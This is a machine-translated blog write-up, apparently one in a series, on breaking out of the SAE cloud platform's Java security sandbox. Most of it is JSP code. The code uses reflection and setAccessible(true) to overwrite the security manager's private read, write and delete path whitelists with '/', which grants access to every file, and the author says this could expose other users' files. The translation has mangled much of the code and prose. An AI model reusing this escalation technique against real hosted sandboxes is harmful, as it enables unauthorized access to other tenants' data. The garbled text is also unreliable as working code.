SAE Cloud Service Security Sandbox Bypass 5 (Force modify class private permission)

Summary
The author mentioned an important class in the article "SAE Cloud Service Security Sandbox bypassing 4 (bypassing File Permission defense)", which is used for SAE security authentication. It is called "com. sina. sae. security. saeSecurityManager ", this class provides several verification methods. This time by pass, the author puts the target on this class.
Body
As mentioned in the previous article, if you want to use this class as the basic class for sandbox security authentication, you must inherit java. lang. securityManager. In the current running environment, you can find the current SecurityManager object and the specific class name. You can run the static method getSecurityManager () of the System class. security. if the manager command line option specifies that the default security manager is used or the custom security manager is used, the security manager is returned.
Test the sandbox Environment
<% = System. getSecurityManager () %>
The returned information on the page shows the Class address and class name. It is indeed the class that prompts us a sandbox security error. In this way, you can write a code segment to view the attributes of the class.
Let's take a look at the attributes of this class:
<% @ Page import = "java. io. *, java.net. *, java. lang. reflect. *" %>
<% = System. getSecurityManager () %> <br>
<%
ClassLoader cl = Thread. currentThread (). getContextClassLoader ();
Try {
Class c = cl. loadClass ("com. sina. sae. security. SaeSecurityManager ");
%> <% = C. toString () %> <%
Field [] f = c. getDeclaredFields ();
%> <% = "----------------------------------" %> <Br> <%
For (int I = 0; I <f. length; I ++)
{
%> <% = F [I]. getType () + "|" + f [I]. getName () %> <br> <%;
}
} Catch (Exception e ){
%> <% = E %> <%
}
%>
This code traverses all attributes of an object, including private and public attributes.
After the page is opened, the execution result is displayed:
 



We can see the following property list:
String [] rwPath
String [] readPath
String [] deletePath
BAN_LIST_STARTSWITH
BAN_LIST_FULLNAME
These attributes can be seen through the Chinese Translation of English words.
String [] rwPath-this is a path list, which may represent the path of the file write permission. if you guess well, it is probably the path of my web directory.
String [] readPath-this is a list of paths, which may represent the path of the file read permission. if you guess well, it is probably the path of my web directory.
String [] deletePath-this is a path list, which may represent the path of the file deletion permission. if you guess well, it is probably the path of my web directory.
With these attributes, it is enough to explain the problem. The relevant Code of SAE will determine the read and write permissions of the file based on the three paths.
Elevation of Privilege
Can this attribute be changed? If they are public, they can be changed directly.
Try writing code to modify these paths:
<% @ Page import = "java. io. *, java.net. *, java. lang. reflect. *" %>
<%
SecurityManager security = System. getSecurityManager ();
Try {
Class c = System. getSecurityManager (). getClass ();
%> <% = C. toString () %> <%
Field [] f = c. getDeclaredFields ();
For (int I = 0; I <f. length; I ++)
{
%> <% = F [I]. getType () + "|" + f [I]. getName () %> <br> <%
Try {
F [I]. set (System. getSecurityManager (), new String [] {"/"});
} Catch (Exception e ){
%> <% = E %> <%
}
}
%> <% = "----------------------------------" %> <Br> <%
For (int I = 0; I <f. length; I ++)
{
%> <% = F [I]. getType () + "|" + f [I]. getName () %> <br> <%;
}
} Catch (Exception e ){
%> <% = E %> <%
}
%>
<% = Security. toString () %>
The page displays
 



Copy this important information
Java. lang. illegalAccessException: Class org. apache. jsp. sm_jsp can not access a member of class com. sina. sae. security. saeSecurityManager with modifiers "private" class [Ljava. lang. string; | readPath
This error indicates that the "private" field cannot be accessed and cannot be changed directly. However, this is not unsolvable. If the current sandbox permission permits "suppressAccessChecks", you can
SetAccessible (true)
To force the modification of private fields. Coincidentally, SAE does allow this permission. During the first bypass operation, I listed some permission lists, including this permission.
 
Therefore, as long as you modify the code briefly, you can forcibly modify this attribute:
<% @ Page import = "java. io. *, java.net. *, java. lang. reflect. *" %>
<%
SecurityManager security = System. getSecurityManager ();
// ClassLoader cl = Thread. currentThread (). getContextClassLoader ();
Try {
Class c = System. getSecurityManager (). getClass ();
%> <% = C. toString () %> <%
 
Field [] f = c. getDeclaredFields ();
 
For (int I = 0; I <f. length; I ++)
{
F [I]. setAccessible (true );
%> <% = F [I]. getType () + "|" + f [I]. getName () %> <br> <%
Try {
F [I]. set (System. getSecurityManager (), new String [] {"/"});
} Catch (Exception e ){
%> <% = E %> <%
}
}
%> <% = "----------------------------------" %> <Br> <%
For (int I = 0; I <f. length; I ++)
{
%> <% = F [I]. getType () + "|" + f [I]. getName () %> <br> <%;
}
} Catch (Exception e ){
%> <% = E %> <%
}
 
%>
<% = Security. toString () %> www.2cto.com
This can be changed. This page is called an Elevation of Privilege page. As long as you access this page, the permissions of the current app will be upgraded to allow access to all files.
Before that, let's take a look at the effect of not using Elevation of Privilege to read files:
 



This file cannot be read. Open the Elevation of Privilege JSP file below:
 




This does not return an error that cannot be modified because it is private. For the subsequent "Can not set static final java. util. set field ", because" BAN_LIST_STARTSWITH ", the field type is not a String array. We will not modify this field anyway, so it does not matter, it is important that we change the whitelist of the three files that allow the current app to read, write, and delete to "/", which means that you can read, delete, and modify any files.
Next, visit the address of the read file again:
 
 
At this point, the permissions have been broken. This time, we will not capture other user diagrams on the cloud. Every time this process is complete, we all know.
Summary
The author does not know what to summarize. After several times of bypass, we can see that the developer's understanding of security is almost zero. In this case, it is meaningless, the author will only record the number of times, unless there is a topic worth writing, otherwise it is too lazy to post.
In short, the permissions in the permission list must be carefully considered before they can be opened. For other summary content, see the previous article.